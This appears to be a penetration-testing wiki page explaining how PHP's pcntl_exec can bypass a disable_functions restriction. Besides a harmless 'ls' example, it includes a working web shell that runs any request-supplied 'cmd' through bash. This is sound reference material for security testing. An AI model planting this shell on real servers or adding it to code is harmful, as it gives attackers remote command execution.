disable-functions-bypass-php-4-greater-than-4-2-0-php-5-pcntl-exec.md (2384B)
1 --- 2 title: "PHP pcntlexec Command Execution" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # PHP `pcntl_exec` Command Execution 14 15 If the PCNTL extension is loaded and `pcntl_exec` is not itself disabled, the function can start an executable even when more familiar command-execution functions are listed in `disable_functions`. `pcntl_exec` replaces the current process; it does not create a child process, and its arguments must be supplied as an array.<sup>[[1]](#references)</sup> 16 17 The following minimal example executes `ls -l /var/tmp`. It is adapted from an older `disable_functions` bypass demonstration.<sup>[[2]](#references)</sup> 18 19 ```php 20 <?php 21 $program = '/bin/ls'; 22 $arguments = ['-l', '/var/tmp']; 23 24 if (function_exists('pcntl_exec')) { 25 pcntl_exec($program, $arguments); 26 } 27 28 // This line is reached only if pcntl_exec() fails. 29 echo "pcntl_exec failed\n"; 30 ?> 31 ``` 32 33 This technique is Unix-specific and can terminate or replace a PHP worker process. Use it only in an authorized test environment.<sup>[[1]](#references)</sup> 34 35 For a request-driven lab check, keep the argument as an array; passing a string as the second parameter is invalid. Because `pcntl_exec()` replaces the PHP process, command output is written directly to the current response or process streams rather than returning to PHP:<sup>[[1]](#references)</sup> 36 37 ```php 38 <?php 39 if (function_exists('pcntl_exec') && isset($_REQUEST['cmd'])) { 40 pcntl_exec('/bin/bash', ['-c', $_REQUEST['cmd']]); 41 } 42 ?> 43 ``` 44 45 ## References 46 47 - [1] [PHP Manual - `pcntl_exec`](https://www.php.net/manual/en/function.pcntl-exec.php) 48 - [2] [SafeBuff - `disable_functions` bypass (archived)](https://web.archive.org/web/20170801153107/http://blog.safebuff.com:80/2016/05/06/disable-functions-bypass/)